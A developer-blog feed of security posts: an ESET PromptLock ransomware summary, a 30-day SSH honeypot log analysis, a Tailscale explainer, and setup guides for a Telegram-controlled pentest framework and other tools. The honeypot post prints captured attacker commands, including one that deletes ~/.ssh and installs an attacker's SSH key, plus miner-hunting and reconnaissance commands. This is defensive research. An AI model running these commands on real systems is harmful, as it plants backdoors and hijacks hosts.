DEV Community: Sofiane Hamlaoui

PromptLock: The Dawn of AI-Powered Ransomware - A Deep Dive into ESET's Groundbreaking Discovery

Sofiane Hamlaoui — Wed, 27 Aug 2025 17:58:34 +0000

Executive Summary

The cybersecurity landscape has reached a significant milestone with ESET's discovery of PromptLock, the first known AI-powered ransomware.

This groundbreaking malware leverages OpenAI's gpt-oss:20b model through the Ollama API to dynamically generate malicious scripts, representing an unprecedented evolution in ransomware sophistication.

While currently existing as a proof-of-concept, PromptLock signals a paradigm shift in how cybercriminals may weaponize artificial intelligence for malicious purposes.

You can check my latest blog where I did write about such attacks and how imminent is this kind of attack will happen. The Growing Threat: The Dark side of AI and LLMs

The Technical Architecture Behind PromptLock

AI-Powered Script Generation

PromptLock represents a fundamental departure from traditional ransomware architectures. Unlike conventional malware that relies on static, pre-written code, this innovative threat uses hard-coded prompts to instruct an AI model to generate malicious Lua scripts on demand. The malware establishes a connection to OpenAI's gpt-oss:20b model via the Ollama API, creating a dynamic code generation system that can adapt its behavior in real-time.

The ransomware employs a sophisticated approach by avoiding the download of the entire AI model, which would require several gigabytes of storage. Instead, attackers can establish proxy connections or tunnels from compromised networks to servers running the Ollama API with the model. This technique, classified under MITRE ATT&CK framework as T1090.001 (Internal Proxy), is frequently employed in modern cyberattacks.

Cross-Platform Lua Script Execution

The generated Lua scripts provide PromptLock with exceptional cross-platform compatibility, enabling operations across Windows, Linux, and macOS environments. These scripts perform multiple malicious functions including:

File system enumeration : Systematically mapping directory structures
Target file inspection : Identifying valuable data for encryption or exfiltration
Selective data exfiltration : Stealing sensitive information before encryption
File encryption operations : Using the SPECK 128-bit algorithm

SPECK Encryption Implementation

PromptLock utilizes the SPECK 128-bit encryption algorithm, a lightweight block cipher developed by the National Security Agency (NSA). This cipher choice is particularly strategic for ransomware operations due to its:

High performance on resource-constrained devices
Rapid encryption capabilities essential for quick file scrambling
Cross-platform compatibility supporting the malware's multi-OS targeting

The SPECK algorithm operates on 128-bit blocks using a combination of simple operations including bitwise XOR, addition modulo operations, and bitwise shifts. Its lightweight nature ensures efficient encryption even on systems with limited computational resources.

Dynamic Threat Adaptation

One of PromptLock's most concerning characteristics is its non-deterministic behavior. Since large language models inherently produce varying outputs for identical inputs, the malware can exhibit different behaviors across infections. This variability significantly complicates traditional signature-based detection methods, as indicators of compromise (IoCs) may vary from one execution to another.

The malware's AI-driven approach enables several advanced capabilities:

Environment-specific adaptation : Tailoring attacks based on system characteristics
Evasion technique variation : Implementing different obfuscation methods per deployment
Dynamic payload generation : Creating unique attack vectors for each target

Current Implementation Status

ESET researchers emphasize that PromptLock appears to be a proof-of-concept or work-in-progress rather than fully operational malware deployed in active attacks. Several indicators support this assessment:

Incomplete functionality : The destructive file deletion capability remains unimplemented
Symbolic Bitcoin address : The ransom payment address belongs to Bitcoin creator Satoshi Nakamoto rather than actual attackers
Research-oriented indicators : Multiple aspects suggest experimental rather than operational deployment

Conclusion

The discovery of PromptLock marks a watershed moment in cybersecurity history, representing the first successful integration of artificial intelligence into ransomware operations. While currently existing as a proof-of-concept, this development foreshadows a future where AI-powered malware becomes increasingly common and sophisticated.

ESET's research demonstrates both the innovative potential of malicious AI applications and the critical importance of proactive cybersecurity research. Organizations must recognize that the traditional reactive approach to cybersecurity is insufficient against AI-powered threats that can adapt and evolve in real-time.

The cybersecurity community must unite in developing advanced defensive capabilities that match the sophistication of these emerging threats. This includes investing in AI-powered detection systems, enhancing threat intelligence sharing, and fostering collaboration between security researchers and practitioners.

As we enter this new era of AI-powered cyber threats, the lesson from PromptLock is clear: the future of cybersecurity will be determined by our ability to harness artificial intelligence not just as a tool for productivity, but as a fundamental component of our digital defense infrastructure. The time for preparation is now, before proof-of-concepts like PromptLock evolve into fully operational weapons in the hands of cybercriminals.

What You Get After Running an SSH Honeypot for 30 Days

Sofiane Hamlaoui — Sun, 16 Jun 2024 21:32:59 +0000

What is a honeypot?

A honeypot detects and records attacks when an attacker tries to break into a system.

The honeypot we will discuss here is an SSH honeypot.

Environment

OS: Ubuntu 24.04 LTS x86_64 
Kernel: 6.8.0-31-generic

Login Attempts

cat X.log | grep -c "login attempt"
11599

There were a total of 11,599 login attempts. Divided by 30 days, this means an average of 386 login attempts per day.

Used Usernames

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
   8181 root
    977 345gs5662d34
    359 admin
    198 pi
    105 0
     71 ubuntu
     51 ubnt
     46 support
     37 user
     30 oracle

As expected, there are many attacks that target customary and default usernames.

For the 345gs5662d34 user, according to the Aalborg University of Denmark Research this could be the default credential for a Polycom CX600 IP telephone

Check it here :

SweetCam: an IP Camera Honeypot

Passwords

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
    977 345gs5662d34
    967 3245gs5662d34
    246 admin
    239 123456
    208 password
    155 0
     88 root
     75 raspberry
     73 123
     66 raspberryraspberry993311

Once again, the same as the default username for Polycom CX600 IP telephone

Commands executed after login

cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
   6775 echo -e "\x6F\x6B"
   1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
   1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
    320 uname -s -v -n -r -m
    112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
     87 uname -a
     29 ps | grep '[Mm]iner'
     29 ps -ef | grep '[Mm]iner'
     29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
     29 ifconfig
     29 echo Hi | cat -n
     29 cat /proc/cpuinfo
     29 /ip cloud print
     23 whoami
     23 which ls
     23 w
     23 uname -m
     23 uname
     23 top
     23 lscpu | grep Model
     23 ls -lh $(which ls)
     23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
     23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
     23 crontab -l
     23 cat /proc/cpuinfo | grep name | wc -l
     23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
     23 cat /proc/cpuinfo | grep model | grep name | wc -l

Now the interesting part starts

The oinasf script

The execution of a mysterious script, ./oinasf, followed by attempts to read and display the system’s executable content, indicates a probing strategy for vulnerabilities or valuable information.

The use of /ip cloud print suggests that bots target MikroTik routers to access or disrupt cloud-based services, while uname -s -m provides them with essential details about the operating system and machine architecture, valuable for crafting further actions tailored to the system’s specifics.

In conclusion, these commands represent a clear strategy to infiltrate, assess, and establish control over targeted systems.

They emphasize the bot’s preference for direct manipulation and sustained access highlighting the critical need for robust defenses against such common yet potentially devastating tactics.

The mdrfckr crypto miner

This miner would simply create a cron job that would delete everything on the .ssh folder and add a single ssh key and lock other users out.

After that it would kill other miners if they exist and just have the open field.

You can check this repo of someone who already got hacked and the miner was used on his server : Dump of the crypto-miner that got installed on my system — Github

The MIPS malware

Probably another MIPS (Multiprocessor without Interlocked Pipeline Stages) architecture malware, targeting routers and IoT devices.

Here is a good read and analysis of the behaviour of a MIPS Malware :

Analyzing a Backdoor/Bot for the MIPS Platform

The Sakura.sh Script

This script is part of the Gafgyt Malware.

Gafgyt , also known as BASHLITE , is a botnet affecting Internet of Things (IoT) devices and Linux-based systems. The malware aims to compromise and gain control of these devices, often by exploiting weak or default passwords, as well as known vulnerabilities. Gafgyt has been around since 2014 and has evolved into multiple variants, each with its own set of features and capabilities, including the ability to launch distributed denial of service (DDoS) attacks.

Here is A Detailed Analysis of the Gafgyt Malware Targeting IoT Devices

The magic of Tailscale

Sofiane Hamlaoui — Fri, 14 Jun 2024 04:13:32 +0000

If you have multiple computers in your life including computer-adjacent things like network attached storage it’s likely you’d like to have access to each of those devices, always.

If I need to inspect a file on my Synology in my house while I’m a passenger in the car, I want to be able to do so.

The easiest way to do this is to expose the port(s) your device needs for remote access through your router/firewall.

Unfortunately, this exposes your device to the entire Internet and that’s undesirable.

Traditional VPNs

The easy solution to this problem is a Virtual Private Network , this means you run some sort of server inside your network that will allow devices outside the network to tunnel into the network.

Once a device is on the VPN it can access anything within that network.

Said differently, if your phone is on a VPN that is hosted in your house, then your phone can access all the devices in your house. Most corporate VPNs work this same way.

If you’ll permit some hand-waving and over-simplification, traditional VPNs tend to be a sort of funnel where there is one server running inside the network you wish to tunnel into, and all clients connect to that server. That makes setup easy, but generally, it’s sort of an all-or-none scenario, you’re either on the VPN or you’re not.

What if there was a better way?

Tailscale

Tailscale is a VPN service that makes your devices and applications accessible anywhere in the world, securely and effortlessly. It achieves this through encrypted point-to-point connections using the open-source WireGuard protocol.

Essentially, only devices within your private network can communicate with each other

Tailscale’s Approach

Decentralized : Avoids centralization by connecting nodes directly.
Lower Latency : Devices communicate directly, resulting in lower latency.
Higher Throughput : Traffic flows directly between machines, improving efficiency.
Key Exchange and Coordination : Tailscale manages the exchange of public keys and coordinates the connections between nodes.
Network Traffic : Traffic typically flows directly between nodes for the shortest path and best performance.
Ease of Use : Tailscale is designed to be user-friendly, requiring minimal configuration from the user.

By leveraging the WireGuard protocol and a decentralized network structure, Tailscale provides a secure and efficient way to connect your devices, no matter where they are located.

How it Works

Tailscale is fast and reliable. Unlike traditional VPNs, which tunnel all network traffic through a central gateway server, Tailscale creates a peer-to-peer mesh network (called a tailnet):

The central gateway may or may not be close to users, thus resulting in higher latency. Because traffic is centralized, it can also act as a bottleneck, slowing down connections further.

With Tailscale, each device is connected to the other directly, resulting in lower latency.

Who’s it for?

Developers can use Tailscale to publish experimental services to their team without the hassle of configuring firewall rules and network configurations.

Small business owners can provide their work-from-home employees with a secure way to access sensitive resources in minutes without spending thousands of dollars on traditional VPN solutions.

Enterprise leaders can reduce their security risk by drastically reducing the complexity of internal networks. By using Access Control Lists and your existing identity provider, each user has the exact level of access they need — your accountants can access the payroll system, your support team can access the bug tracker, and your developers can access servers and databases.

Terminology and concepts

Access control lists

An access control list (ACL) manages system access using rules in the tailnet policy file. You can use ACLs to filter traffic and enhance security by managing who and what can use which resources.

CL tags

A tag lets you assign an identity (that’s separate from human users) to devices. You can use tags in your access rules to restrict access.

Admin console

The admin console is the central location to view and manage your Tailscale network. You can manage nodes on your network, users and their permissions, and settings such as key expiry. The admin console also informs you if an update to the Tailscale client is available for your device. When you make changes from the admin console, the coordination server updates the changes to your tailnet immediately.

API

API is an acronym for application programming interface. APIs define a set of rules to interact with an application or service programmatically. The Tailscale API lets you manage your Tailscale account and tailnet.

CLI

CLI is an acronym for command line interface. The Tailscale CLI includes a robust set of commands with functionality that GUI applications might not have. The Tailscale CLI is installed automatically when you install Tailscale on Linux, macOS, or Windows.

Coordination server

A coordination server is a central server that maintains a connection to all machines in your Tailscale network. It manages encryption keys, network changes, access policy changes, and maintains a connection to all machines in your Tailscale network. The coordination server is part of the control plane, not the data plane. It avoids being a performance bottleneck by not relaying traffic between machines.

Device

A device is anything other than a user. It can be physical or virtual and sends, receives, or processes data on your Tailscale network.

Device key

A device key is a unique public and private key pair for a specific device. More than one user can use a device key, but each device can only have one device key. The combination of a specific user with a device key represents a unique node.

Firewall

A firewall limits what network traffic can pass between two points. Firewalls can be hardware-based or software-based. Tailscale includes a built-in firewall, defined by the domain’s access rules.

Identity Provider

An identity provider is a method for users to authenticate to a tailnet. Examples of identity providers include Google, Okta, and Microsoft. Tailscale is not an identity provider but relies other identity providers for authentication.

Key expiry

Key expiry is the end of the validity period for a cryptographic key. An expired key can no longer encrypt or decrypt data, nor authenticate a device to a Tailscale network.

Using Tailscale means you never have to manage encryption keys directly. Tailscale automatically expires keys and requires them to be regenerated at regular intervals. You can disable key expiry for long-lived devices from the admin console.

MagicDNS

MagicDNS automatically registers memorable hostnames for devices in your Tailscale network. It also extends and improves DNS functionality.

NAT traversal

NAT is an acronym for network address translation. NAT traversal is a way to connect nodes across the internet through barriers such as firewalls. Most internet devices can’t talk to each other because of firewalls and devices that do network address translation. NAT traversal works around these barriers, allowing data to traverse the network.

Network topology

A network topology is an arrangement of nodes in a network. It shows the connections between them. Examples of network topologies include star, bus, hub-and-spoke, mesh, and hybrid.

Traditional virtual private networks (VPNs) use a hub-and-spoke topology. Each machine communicates with another in this setup by sending all traffic through a central gateway machine. Tailscale operates as a mesh topology where each machine can talk directly to others using NAT traversal.

Node

A node is a combination of a user and a device.

Peer

A peer is another node that your node is trying to talk to. A peer might or might not be in the same domain.

Relay

A relay is an intermediary server that passes data between two or more nodes in a network. Tailscale uses a special type of globally distributed relay server called Designated Encrypted Relay for Packets (DERP). DERP relay servers function as a fallback to connect nodes when NAT traversal fails.

SSO

SSO is an acronym for single sign-on. Single sign-on lets users log in to one site using the identity of another.

Tailnet

A tailnet is another term for a Tailscale network, which is an interconnected collection of users, machines, and resources. The network has a control plane and a data plane that work in unison to manage access and send data between nodes.

There are personal and organization tailnets. A personal tailnet is a shared domain single-user tailnet (like gmail.com). An organization tailnet is a custom domain tailnet (like example.com),

Tailnet policy file

The tailnet policy file stores your Tailscale network’s access rules, along with other tailnet configuration items. It uses human JSON (HuJSON) and conforms to the Tailscale policy syntax.

Tailscale IP address

A Tailscale IP address is a unique IP address assigned to each machine in your Tailscale network. It’s always in the form 100.x.y.z (for example, 100.101.102.103). It stays the same even when switching between your home internet connection, cellular networks, or coffee shop Wi-Fi networks.

Tunnel

In networking, a tunnel is an encapsulated connection between one or more points in a network. It lets users, nodes, or resources communicate securely over a public data network.

WireGuard

WireGuard is the underlying cryptographic protocol that Tailscale uses.

Without forgetting modern design of the clients available on MacOS , Linux , IOS , Android & Windows.

x.com

Use Telegram bot as a Penetration Testing Framework

Sofiane Hamlaoui — Sun, 15 Dec 2019 05:20:56 +0000

✈️Use Telegram bot as a Penetration Testing Framework

The idea ? :

So I was checking out my browser bookmarks, then I noticed having a medium article about Telegram bot for Hacking & Pentesting . I checked the article and shared it on my Twitter account, than I’ve seen that some CyberSec (or Interested by ) loved the bot idea.

I made a Penetration Testing Framework called Lockdoor, So why not making the same thing with my tool ?

Updates : Arbaz Hussain’s tool isn’t working now ( 12/15/2019 )

Check it here : https://github.com/arbazkiraak/hackbot

How does that work ?

So the idea is by running Lockdoor Framework from any Telegram chat/messenger.

Basically, it’s about running ( commands ) to run the tool from any Telegram chat, Of course before doing that you have first to configure & install the tool first, than configuring the bot and using it.

Cool, Let’s do that !

1 — Configuring & Installing Lockdoor Framework :

To do that, you can check the installation wiki of the tool :

SofianeHamlaoui/Lockdoor-Framework

Or :

$: git clone [https://github.com/SofianeHamlaoui/Lockdoor-Framework.git](https://github.com/SofianeHamlaoui/Lockdoor-Framework.git) && cd Lockdoor-Framework 
$: chmod +x ./install.sh 
$: ./install.sh

2 — Configuring & Installing the Telegram bot

For that I used A modified version of shell bot, made by _ _ botgram .

Configuring the bot

https://github.com/SofianeHamlaoui/lockdoor-bot

Starting a conversation with botfather

Go to https://web.telegram.org/
Start a conversation with our father botfather

Creating the Telegram bot

type /newbot to create a new bot
give it a Name. ( A name for your Telegram Bot )
give it a Username. ( A username for your Telegram bot
Copy and Save the API
Configuring & Running the bot server

Requirements : 
- python
- [node-pty](https://github.com/Microsoft/node-pty#dependencies)
- Telegram 
- Happiness :D

* Installing

$: git clone [https://github.com/SofianeHamlaoui/Lockdoor-bot](https://github.com/SofianeHamlaoui/lockdoor-bot) && cd Lockdoor-bot
$: npm install

*Starting the server :

$: node server

The first time you run it, it will ask you some questions and create the configuration file automatically: config.json. You can also write it manually, see config.example.json

Configuring the server

Using the API token you copied after creating the Telegram bot
Use the link given by the bot ( https://t.me/X/X/X/X/X/X/X/X/X/ ) and send a message to make your Telegram profile as bot’s owner )
*Running the server :

$: node server

The bot is ready

CONGRATULATIONS ! Your Bot is ready ❤

The commands :

You have lot of commands to use with this bot here is the list of the commands ( or you can check them fromgithub’s repo_ )_

run - Execute command
enter - Send input lines to command
type - Type keys into command
control - Type Control+Letter
meta - Send the next typed key with Alt
keypad - Toggle keypad for special keys
redraw - Force the command to repaint
end - Send EOF to command
cancel - Interrupt command
kill - Send signal to process
status - View status and current settings
cd - Change directory
env - Manipulate the environment
shell - Change shell used to run commands
resize - Change the terminal size
setsilent - Enable / disable silent output
setlinkpreviews - Enable / disable link expansion
setinteractive - Enable / disable shell interactive flag
help - Get help
file - View and edit small text files
upload - Upload and overwrite raw files
r - Alias for /run or /enter

The important commands :

/run - to run a command
/enter - to Send input lines to command

After Configuring and running the server, Now it’s time to Use Lockdoor-Framework From any Telegram Chat/Messenger.

Now ! You have 2 choices ! As Lockdoor Framework requires the Root Permissions, You can :

1 > Run the bot server as root, ( Not really recommended)

$: sudo node server

2 > Run lockdoor as root from the telegram chat

$: ( Telegram chat ) : / **run sudo lockdoor**

Go to your telegram bot chat and type / run lockdoor ( or / run sudo lockdoor if you didn’t start the bot server as root )

CONGRATULATIONS ! You’re running a Penetration Testing Framework from a Telegram chat ❤

Screenshots :

From Desktop/Web chat :

Screenshots from the Desktop/Web chat

From phone :

Lockdoor Framework on phone

What’s next ? :

More : Check Lockdoor Framework Github repo with to know more about the tool and how it works ❤

My Github profile :

SofianeHamlaoui/Lockdoor-Framework

My Twitter account :

Sofiane Hamlaoui

My Website :

Sofiane HAMLAOUI on about.me

My Facebook profile

Facebook

Thanks !

Thanks to Arbaz Hussain for his article that gave me this idea.

Thanks to Alba Mendez for her bot-shell that helped me making the lockdoor Telegram bot.

Go-UnderCover : Simple tool to install/use Kali-Undercover on all Linux distros

Sofiane Hamlaoui — Tue, 10 Dec 2019 09:11:04 +0000

Everyone was happy with this new "Kali Undercover mode" on the new Kali Linux 2019.4 release.
So the idea is : Why only Kali Linux, let's do it for all Linux distros!
Here comes Go-UnderCover ❤.
Same code,Same role, but not for one only distro.

• The Github repo : GUC : Go Under Cover
https://github.com/SofianeHamlaoui/Go-undercover

The Best Pack Of Tools For Cyber Security Students | Lockdoor Framework

Sofiane Hamlaoui — Sun, 01 Dec 2019 04:49:44 +0000

Lockdoor is a Framework aimed at helping penetration testers, bug bounty hunters And cyber security engineers. This tool is designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. But containing the favorite and the most used tools by Pentesters. As pentesters, most of us has his personal ' /pentest/ ' directory so this Framework is helping you to build a perfect one.

We all know that there a lot of frameworks and similar tools like lockdoor, So what made lockdoor different, was Adding The Favorite and most used tools by pentesters, Automating the Pentesting process to help you do the job more quickly and the best part ! CHEATSHEETS & RESOURCES! So yes, that's why we made a quick video about lockdoor.

◉ Repo: https://github.com/SofianeHamlaoui/Lockdoor-Framework

◉ The tool developer’s Twitter account : https://twitter.com/S0fianeHamlaoui

◉ Kitploit post about the tool : https://www.kitploit.com/2019/10/lockdoor-framework-penetration-testing.html

◉ The Shadow Brokers video :
https://youtu.be/6njKRrKQtow

With a lot of articles and awesome people sharing it everywhere with anyone.

Convert ISO images to docker images

Sofiane Hamlaoui — Tue, 17 Sep 2019 18:16:03 +0000

🐳 Convert ISO images to docker images

Yep! I was looking for a method or a trick to convert ISO files to docker images, It was hard to find one ! But the only one was not really explained and lacking some information. So here we are !!

Choosing the ISO file :

Well before starting the process ! Keep in mind that you have to use a live disc , means a bootable version of the operating system.

Before Starting ! :

In this tutorial/story, I’ll use Ubuntu 18.04.3 LTS’s live disc ISO,

Keywords :

rootfs : a file system. In Linux, all file systems have a mount point, which is the directory where the mounted file system connects to the root file system
squashfs : a compressed read-only file system for Linux
unsquashfs : a tool to uncompress squashfs file systems

Requirments :

squashfs-tools : install squashfs-tools in your system
Downlading the LiveCD ISO version

ISO file downloaded & squashfs-tools installed

Let’s start ! :

1- Start by creating the 2 folders (rootfs and unsquashfs)



$: mkdir rootfs unquashfs

Creating rootfs & unsquashfs folders

2- mount your ISO file to the rootfs folder as a loop device



$: sudo mount -o loop ubuntu-18.04.3-desktop-amd64.iso rootfs

Mounting the ISO file

3- Find the filesystem.squashfs file



$: find . -type f | grep filesystem.squashfs

Finding the filesystem.squashfs file

4- use unsquashfs to extract filesystem files to the unsquashfs folder (that would take between 5–10mins)



$: sudo unsquashfs -f -d unsquashfs/ rootfs/casper/filesystem.squashfs

Extractingthe filesystem files to the unsquashfs folder

5- compress and import the image using docker (that would take some time 10–20 mins)



$: sudo tar -C unsquashfs -c . | docker import - sofiane/myimg

6- you will get a sha256 hash (somthing like this )



$:sha256:qf917d58831f926c6b93ff84bd6az68550a6cd6c36aeb6c837c53d655d9453sh

Compressing then importing the image using docker

7- test your docker image :



$:docker run -h ubuntu -i -t sofiane/myimg bash

Docker images

Your docker image is READY!

And here you go !

Thank you for reading,

My Twitter :

Sofiane Hamlaoui

My Github :

SofianeHamlaoui - Overview

Support me :

Paypal : paypal.me/SofianeHamlaoui
BTC : 1NR2oqsuevvWJwzCyhBXmqEA5eYAaSoJFk

Lockdoor Framework : A Penetration Testing framework with Cyber Security Resources (Sofiane…

Sofiane Hamlaoui — Tue, 17 Sep 2019 01:28:54 +0000

🔐 Lockdoor Framework : A Penetration Testing framework with Cyber Security Resources (Sofiane Hamlaoui)

Lockdoor ?

Lockdoor, First let’s start by explaining this (kind-of) weird name. Well After days of thinking, I asked my best friend (Rafik) to suggest me a name of a tool on Cyber Security, IT field and all of that! First thing came to his mind was LOCKDOOOR ! I was like … euuuh Oookey let’s roll !

The Idea ?

Well before Lockdoor, I had A shell scripts that downloads all the tools I need from Github, The Public ones from other Github repositories and the Private ones from mine. With that I was customizing, Adding and removing tools and so on.

One day (07/09/2019) I’ve said, Why not making a framework and share it with others, so I can Learn, share and maybe discover new tools that I didn’t even know about! It was at this right moment exactly ! Lockdoor was born :’).

Lockdoor Framework ?

*Lockdoor* is a Framework aimed at helping penetration testers, bug bounty hunters And cyber security engineers.

This tool is designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. But containing the favorite and the most used tools by Pentesters.

As pentesters, most of us has his personal ‘ /pentest/ ‘ directory so this Framework is helping you to build a perfect one.

A NEW tool ?

Yeah, We all know that there a lot of frameworks and similar tools like lockdoor, So my added value ( what made lockdoor different ) was Adding The Favorite and most used tools by pentesters, Automating the Pentesting process to help you do the job more quickly and the best part ! CHEATSHEETS & RESOURCES!

So yes, that’s what made lockdoor a Different New tool.

Okey ?

The Test Video of the 1.0Beta Version (On Youtube) :

Screenshots :

What Tools ?

The Version 1.0Beta has :

Information Gathring Tools (21)
Web Hacking Tools(15)
Reverse Engineering Tools (15)
Exploitation Tools (6)
Pentesting & Security Assessment Findings Report Templates (6)
Password Attack Tools (4)
Shell Tools + Blackarch’s Webshells Collection (4)
Walk Throughs & Pentest Processing Helpers (3)
Encryption/Decryption Tools (2)
Social Engineering tools (1)
All you need as Privilege Escalation scripts and exploits

What’s Next ?

Well ! Adding more tools, resources, cheat sheets to make the life of Penetesters easier ❤

More : Check Lockdoor Framework Github Repo on Github with the most detailed readme file on this planet ( I’m not sure about that ! just saying )

SofianeHamlaoui/Lockdoor-Framework

My twitter account :

Sofiane Hamlaoui